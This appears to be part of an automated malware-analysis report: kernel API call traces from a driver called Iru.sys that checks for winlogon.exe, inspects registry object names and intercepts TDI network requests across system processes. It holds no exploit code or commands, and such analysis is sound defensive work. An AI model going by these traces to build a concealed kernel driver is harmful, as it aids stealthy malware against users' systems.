| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
|
For performance reasons, the remaining entries are omitted.
Click to download all entries as text file. |
|||||
Kernel Graph 5
Code Block #9 (EP #8)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2bc44a |
| Start Address | 0xfffff80041742380 |
Execution Path #8 (length: 1, count: 28, processes: 9)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 9 (svchost.exe, PID: 972) | 2 |
| Process 12 (svchost.exe, PID: 1052) | 1 |
| Process 7 (svchost.exe, PID: 888) | 2 |
| Process 16 (officeclicktorun.exe, PID: 1740) | 6 |
| Process 2 (System, PID: 4) | 3 |
| Process 25 (winlogon.exe, PID: 508) | 5 |
| Process 10 (svchost.exe, PID: 1000) | 5 |
| Process 42 (iexplore.exe, PID: 556) | 1 |
| Process 107 (msfeedssync.exe, PID: 4172) | 3 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
Kernel Graph 6
Code Block #10 (EP #9)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2b21d5 |
| Start Address | 0xfffff8004175b774 |
Execution Path #9 (length: 1, count: 25, processes: 9)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 9 (svchost.exe, PID: 972) | 2 |
| Process 12 (svchost.exe, PID: 1052) | 1 |
| Process 7 (svchost.exe, PID: 888) | 2 |
| Process 16 (officeclicktorun.exe, PID: 1740) | 6 |
| Process 2 (System, PID: 4) | 3 |
| Process 25 (winlogon.exe, PID: 508) | 2 |
| Process 10 (svchost.exe, PID: 1000) | 5 |
| Process 42 (iexplore.exe, PID: 556) | 1 |
| Process 107 (msfeedssync.exe, PID: 4172) | 3 |
Sequence
»
| Symbol | Parameters |
|---|---|
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a458990 |
Kernel Graph 7
Code Block #11 (EP #10)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2c9800 |
| Start Address | 0xfffff800417b6104 |
Execution Path #10 (length: 1, count: 26, processes: 9)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 9 (svchost.exe, PID: 972) | 2 |
| Process 12 (svchost.exe, PID: 1052) | 1 |
| Process 7 (svchost.exe, PID: 888) | 2 |
| Process 16 (officeclicktorun.exe, PID: 1740) | 6 |
| Process 2 (System, PID: 4) | 3 |
| Process 25 (winlogon.exe, PID: 508) | 3 |
| Process 10 (svchost.exe, PID: 1000) | 5 |
| Process 42 (iexplore.exe, PID: 556) | 1 |
| Process 107 (msfeedssync.exe, PID: 4172) | 3 |
Sequence
»
| Symbol | Parameters |
|---|---|
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
Kernel Graph 8
Code Block #12 (EP #57, #180, #23, #181, #155, #46, #162, #51, #52, #182, #152, #148, #188, #153, #156, #158, #157, #189, #190, #161, #192, #168, #196)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x1bbbf |
| Start Address | 0xfffff80041a719c0 |
Execution Path #57 (length: 8, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 8 |
Processes
»
| Process | Count |
|---|---|
| Process 9 (svchost.exe, PID: 972) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a458990 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a458990 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
Execution Path #180 (length: 573, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 573 |
Processes
»
| Process | Count |
|---|---|
| Process 12 (svchost.exe, PID: 1052) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003be10400 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003be10850 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003be10400 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003be10850 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003be10400 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003be10850 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003be10400 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003be10850 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003be10400 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003be10850 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003be10400 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003be10850 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003be10400 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003be10850 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003be10400 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003be10850 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9099780, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9099780, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d562fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8e, ret_val_ptr_out = 0xffffe0003af95ec0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9099780, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9099780, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d562c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8c, ret_val_ptr_out = 0xffffe0003a763d70 |
| ObQueryNameString | Object_ptr = 0xffffc000b9099780, Length = 0x8c, ObjectNameInfo_unk_out = 0xffffe0003a763d70, ReturnLength_ptr_out = 0xffffd0002d562c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NetBT\Linkage, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NetBT\Linkage |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763d70, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95ec0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003be10400 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003be10850 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003be10400 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003be10850 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9099780, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9099780, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d562fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8e, ret_val_ptr_out = 0xffffe0003af95ec0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9099780, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9099780, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d562c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8c, ret_val_ptr_out = 0xffffe0003a763d70 |
| ObQueryNameString | Object_ptr = 0xffffc000b9099780, Length = 0x8c, ObjectNameInfo_unk_out = 0xffffe0003a763d70, ReturnLength_ptr_out = 0xffffd0002d562c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NetBT\Linkage, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NetBT\Linkage |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763d70, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95ec0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003be10400 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003be10850 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003be10400 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003be10850 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9099780, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9099780, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d562fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8e, ret_val_ptr_out = 0xffffe0003af95ec0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9099780, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9099780, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d562c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8c, ret_val_ptr_out = 0xffffe0003a763d70 |
| ObQueryNameString | Object_ptr = 0xffffc000b9099780, Length = 0x8c, ObjectNameInfo_unk_out = 0xffffe0003a763d70, ReturnLength_ptr_out = 0xffffd0002d562c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NetBT\Linkage, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NetBT\Linkage |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763d70, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95ec0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003be10400 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003be10850 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003be10400 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003be10850 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003be10400 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003be10850 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769904, SpinLock_unk_out = 0xffffe0003a769904, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769904, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769904 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769904, SpinLock_unk_out = 0xffffe0003a769904, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769904, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769904 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769904, SpinLock_unk_out = 0xffffe0003a769904, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769904, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769904 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002d562570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002d562528, Handle_out = 0xffffffff80000cac, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000cac, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000cac, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000cac, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47fff |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a763a6c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000461ff680 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003c697cd0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002d562370, ret_val_unk_out = 0xffffe0003b4669f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000461ff680, MemoryDescriptorList_unk_out = 0xffffe000461ff680 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003c697cd0, Irp_unk = 0xffffe0003b4669f0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003b4669f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x60, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003af83fa0 |
